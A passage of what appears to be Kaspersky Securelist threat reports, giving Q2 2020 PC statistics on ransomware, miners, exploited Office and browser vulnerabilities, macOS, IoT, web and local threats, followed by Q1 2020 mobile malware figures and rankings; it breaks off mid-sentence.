\n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| | **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. 
This type of threat shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| | **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. 
The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>) codes. Both were fixed, and neither is known to have been exploited in the wild. 
Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. 
In that mode, the attacker can install any software and access any information on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS**\n\n| | Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe ranking of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. 
That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| | **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). 
\n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nService | % \n---|--- \nTelnet | 80.83% \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nFurther communication with IoT devices that pretended to be infected (and were actually traps) was much more often conducted via Telnet.\n\nService | % \n---|--- \nTelnet | 71.52% \nSSH | 28.48% \n \n_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of devices from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. 
China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.

_Geography of IP addresses of devices from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**

| Country | %* |
|---|---|
| China | 22.12% |
| USA | 10.91% |
| Vietnam | 8.20% |
| Brazil | 5.34% |
| Germany | 4.68% |
| Russia | 4.44% |
| France | 3.42% |
| India | 3.01% |
| Egypt | 2.77% |
| Singapore | 2.59% |

_* Devices in the country from which attacks were carried out, as a share of the total number of attacking devices._

As with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), USA (10.91%) and Vietnam (8.20%).

### Threats loaded into traps

| Verdict | %* |
|---|---|
| Trojan-Downloader.Linux.NyaDrop.b | 32.78 |
| Backdoor.Linux.Mirai.b | 17.47 |
| HEUR:Backdoor.Linux.Mirai.b | 12.72 |
| HEUR:Backdoor.Linux.Gafgyt.a | 9.76 |
| Backdoor.Linux.Mirai.ba | 7.99 |
| HEUR:Backdoor.Linux.Mirai.ba | 4.49 |
| Backdoor.Linux.Gafgyt.bj | 2.23 |
| HEUR:Trojan-Downloader.Shell.Agent.p | 1.66 |
| Backdoor.Linux.Mirai.cn | 1.26 |
| HEUR:Backdoor.Linux.Mirai.c | 0.73 |

_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._

As in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter.
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Algeria | 11.2052 |
| 2 | Mongolia | 11.0337 |
| 3 | Albania | 9.8699 |
| 4 | France | 9.8668 |
| 5 | Tunisia | 9.6513 |
| 6 | Bulgaria | 9.5252 |
| 7 | Libya | 8.5995 |
| 8 | Morocco | 8.4784 |
| 9 | Greece | 8.3735 |
| 10 | Vietnam | 8.2298 |
| 11 | Somalia | 8.0938 |
| 12 | Georgia | 7.9888 |
| 13 | Malaysia | 7.9866 |
| 14 | Latvia | 7.8978 |
| 15 | UAE | 7.8675 |
| 16 | Qatar | 7.6820 |
| 17 | Angola | 7.5147 |
| 18 | Réunion | 7.4958 |
| 19 | Laos | 7.4757 |
| 20 | Mozambique | 7.4702 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or on removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._

In Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Turkmenistan | 48.0224 |
| 2 | Uzbekistan | 42.2632 |
| 3 | Tajikistan | 42.1279 |
| 4 | Ethiopia | 41.7213 |
| 5 | Afghanistan | 40.6278 |
| 6 | Myanmar | 39.1377 |
| 7 | Burkina Faso | 37.4560 |
| 8 | Benin | 37.4390 |
| 9 | China | 36.7346 |
| 10 | Kyrgyzstan | 36.0847 |
| 11 | Vietnam | 35.4327 |
| 12 | Mauritania | 34.2613 |
| 13 | Laos | 34.0350 |
| 14 | Mongolia | 33.6261 |
| 15 | Burundi | 33.4323 |
| 16 | Belarus | 33.0937 |
| 17 | Guinea | 33.0097 |
| 18 | Mali | 32.9902 |
| 19 | Togo | 32.6962 |
| 20 | Cameroon | 32.6347 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_

Overall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.

_Source: "IT threat evolution Q2 2020. PC statistics", Securelist, published 2020-09-03, <https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/>._

_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._

## Quarterly figures

According to Kaspersky Security Network,

* Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.
* A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.
* Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.
* Ransomware attacks were defeated on the computers of 178,922 unique users.
* Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.
* Kaspersky products for mobile devices detected:
  * 1,152,662 malicious installation packages
  * 42,115 installation packages for mobile banking trojans
  * 4339 installation packages for mobile ransomware trojans

## Mobile threats

### Quarter events

Q1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for €0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but also to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.

Another interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.

The third piece of malware that caught our attention this reporting quarter was Trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the chances of their apps getting published and recommended, and to lull the vigilance of potential victims.
Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over another app: in this case, the official Google Play client.

### Mobile threat statistics

In Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.

_Number of malicious installation packages detected, Q1 2019 – Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_

Starting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.

### Distribution of detected mobile apps by type

_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_

Of all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).

Potentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.

In third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p.
against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed at a distance by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%).

It is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.

### Top 20 mobile malware programs

_Note that these malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._

| | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 44.89 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 9.09 |
| 3 | DangerousObject.AndroidOS.GenericML | 7.08 |
| 4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 |
| 5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 |
| 6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 |
| 7 | Trojan.AndroidOS.Handda.san | 2.31 |
| 8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 |
| 9 | Trojan.AndroidOS.Necro.a | 2.19 |
| 10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 |
| 11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 |
| 12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 |
| 13 | Exploit.AndroidOS.Lotoor.be | 1.46 |
| 14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 |
| 15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 |
| 16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 |
| 17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 |
| 18 | Trojan.AndroidOS.Dvmap.a | 1.24 |
| 19 | Trojan.AndroidOS.Agent.rt | 1.21 |
| 20 | Trojan.AndroidOS.Vdloader.a | 1.18 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._

First place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). It is triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7.08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

In fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.

Trojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.

Sixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers.
Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.

The verdict Trojan.AndroidOS.Handda.san (2.31%), in seventh place, covers a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.

Trojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the Top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.

### Geography of mobile threats

_Map of